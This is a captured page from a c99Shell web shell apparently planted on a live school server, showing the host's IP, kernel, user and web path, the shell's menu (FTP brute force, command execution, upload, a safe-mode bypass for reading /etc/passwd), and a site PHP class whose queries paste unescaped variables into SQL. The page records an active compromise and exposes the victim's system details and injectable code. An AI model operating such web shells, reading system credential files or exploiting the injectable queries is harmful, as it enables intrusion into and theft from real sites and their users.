110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/teacher/class/ drwxr-xr-x Free 52.39 GB of 127.8 GB (41%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/teacher/class/ drwxr-xr-x
Free 52.39 GB of 127.8 GB (41%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: clsUmUserGroup.php (2.27 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php
//--Class umusergroup--------------------------
//--PK of umusergroup ::
//	1. UgGpID
//	2. UgUsID
class umusergroup extends clsDB{

var $result;

var $UgID;
var $UgGpID;
var $UgUsID;

function umusergroup(&$c){
	$this->c=$c->c; 
	$this->DB=$c->db;
}

function Save(){
	if ($this->status==1){
		$this->UgID=$this->GetNextCode();
		$sql = "insert into umusergroup values('$this->UgID', '$this->UgGpID', '$this->UgUsID')";
	}else {
		$sql = "update umusergroup set UgGpID='$this->UgGpID', UgUsID='$this->UgUsID' where UgGpID='$this->UgGpID' and UgUsID='$this->UgUsID'";
	}
	return $this->Dml($sql);
}

function Delete(){
	return $this->Dml("delete from umusergroup where UgGpID='$this->UgGpID' and UgUsID='$this->UgUsID'");
}

function GetNextCode(){
	$this->SetQuery("select max(UgID) as num from umusergroup");
	if ($result=$this->GetResult()) {
		return $result['num']+1;
	}
}

function RSumusergroup(){
	$this->SetQuery("select * from umusergroup");
}
function RSumusergroup2(){
	$this->SetQuery("select * from umusergroup where UgUsID!='1'");
}
function GetRecord(){
	if ($this->result = $this->GetResult()) {
		$this->UgID = $this->result['UgID'];
		$this->UgGpID = $this->result['UgGpID'];
		$this->UgUsID = $this->result['UgUsID'];
		return 1;
	}else {
		return 0;
	}
}

function SearchByKey($xKey1, $xKey2){
	if ($this->SetQuery("select * from umusergroup where UgGpID='$xKey1' and UgUsID='$xKey2'")){
		return 1;
	}else {
		return 0;
	}
}
//****************** You can add new functions below **********************//
function DeleteByGpID($GpID){
	return $this->Dml("delete from umusergroup where UgGpID='$GpID'");
}
function DeleteByUsID($UsID){
	return $this->Dml("delete from umusergroup where UgUsID='$UsID'");
}
function RSgroupByUs($UsID, $key = ""){
    if ($key == "")
	    $sql="select * from umusergroup where UgUsID='$UsID'";
    else
        $sql="select * from umusergroup where UgUsID='$UsID' order by $key";
	$this->SetQuery($sql);
}
function RSgroupByUgUsID($UsID,$dbname,$key){

        $sql="select a.UgGpID from $dbname.umusergroup a inner join $dbname.umgroup  b on a.UgUsID='$UsID' and b.GpStID='10' and a.UgGpID =b.GpID order by a.$key";

	$this->SetQuery($sql);
}

} //--End class umusergroup--

?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0126 ]--